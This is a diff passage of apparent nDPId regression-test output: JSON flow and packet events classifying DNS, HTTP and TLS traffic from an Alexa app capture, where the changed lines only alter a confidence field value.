{"query":"api.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.29.146"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067968,"flow_last_seen":1490976067968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976067968,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1490976067968,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976067968,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8kvdAAEAGfFusECrYNu8dkqLbAbtu3MorAAAAAKAC\/\/\/lJAAAAgQFtAQCCAoA9ljcAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1490976068061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976068061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw1NlAAOcGk4Q27x2SrBAq2AG7otunydf3btzKLHASH\/7bQAAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1490976068064,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976068064,"pkt":"AMDKkaPvePiC0\/vCCABFAAAokvhAAEAGfG6sECrYNu8dkqLbAbtu3Mosp8nX+FAQAVclsgAA"} -00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976067968,"flow_last_seen":1490976068066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976068066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":907,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1681,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01354{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":909,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3551,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","server_names":"api.amazon.com,wsync.us-east-1.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=api.amazon.com","fingerprint":"1D:A3:CD:C3:06:9E:9B:A0:61:1E:1A:75:55:C1:A8:B0:DC:F8:75:2D"}} +00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976067968,"flow_last_seen":1490976068066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976068066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":907,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1681,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01354{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":909,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3551,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","server_names":"api.amazon.com,wsync.us-east-1.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=api.amazon.com","fingerprint":"1D:A3:CD:C3:06:9E:9B:A0:61:1E:1A:75:55:C1:A8:B0:DC:F8:75:2D"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":958,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071237,"flow_last_seen":1490976071237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071237,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1490976071237,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071237,"pkt":"AMDKkaPvePiC0\/vCCABFAAA870hAAEAGV6asECrYNF7ohsHGAFAgR7VrAAAAAKAC\/\/9hTwAAAgQFtAQCCAoA9lojAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":959,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071286,"flow_last_seen":1490976071286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -370,77 +370,77 @@ 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":960,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1490976071306,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071306,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8mshAAEAGrCasECrYNF7ohrJ+AbvI+MDiAAAAAKAC\/\/+6\/AAAAgQFtAQCCAoA9loqAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071312,"flow_last_seen":1490976071312,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976071312,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1490976071312,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976071312,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WllAAEARM1ysECrYrBAqAWH5ADUAKtG2BusBAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071312,"flow_last_seen":1490976071312,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976071312,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071312,"flow_last_seen":1490976071312,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976071312,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":962,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1490976071322,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071322,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3TJAAOcGwsc0XuiGrBAq2ABQwcY3D6dGIEe1bHASH\/76HQAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":963,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1490976071324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071324,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo70lAAEAGV7msECrYNF7ohsHGAFAgR7VsNw+nR1AQAVdEjwAA"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":964,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071237,"flow_last_seen":1490976071324,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1490976071324,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":964,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071237,"flow_last_seen":1490976071324,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1490976071324,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":965,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071349,"flow_last_seen":1490976071349,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071349,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1490976071349,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071349,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lMZAAEAGsiisECrYNF7ohrJ\/Abuhu87oAAAAAKAC\/\/\/ULgAAAgQFtAQCCAoA9louAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":966,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1490976071360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071360,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwaLpAAOcGN0A0XuiGrBAq2AG7sn5peFkmyPjA43ASH\/5viQAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1490976071361,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071361,"pkt":"AMDKkaPvePiC0\/vCCABFAAAomslAAEAGrDmsECrYNF7ohrJ+AbvI+MDjaXhZJ1AQAVe5+gAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":968,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071306,"flow_last_seen":1490976071362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976071362,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":968,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071306,"flow_last_seen":1490976071362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976071362,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1490976071363,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071363,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWSpAAOcGRtA0XuiGrBAq2AG7sn0V5Ch+kScxUnASH\/67KQAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1490976071364,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071364,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoa3pAAEAG24isECrYNF7ohrJ9AbuRJzFSFeQof1AQAVcFmwAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":971,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071286,"flow_last_seen":1490976071365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":971,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071286,"flow_last_seen":1490976071365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":972,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071380,"flow_last_seen":1490976071380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071380,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1490976071380,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071380,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Ky9AAEAGG8CsECrYNF7ohrKAAbueQXEdAAAAAKAC\/\/81bwAAAgQFtAQCCAoA9loyAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":973,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071385,"flow_last_seen":1490976071385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071385,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1490976071385,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071385,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fzdAAEAGx7esECrYNF7ohrKBAbt+UyUFAAAAAKAC\/\/+hdAAAAgQFtAQCCAoA9loyAAAAAAEDAwg="} 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1490976071389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976071389,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl2DBAAEARtV2sECoBrBAq2AA1YfkAUYstBuuBgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAADUACwhwaXRhbmd1acASwC4AAQABAAAANQAENF7ohg=="} -00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":974,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976071389,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 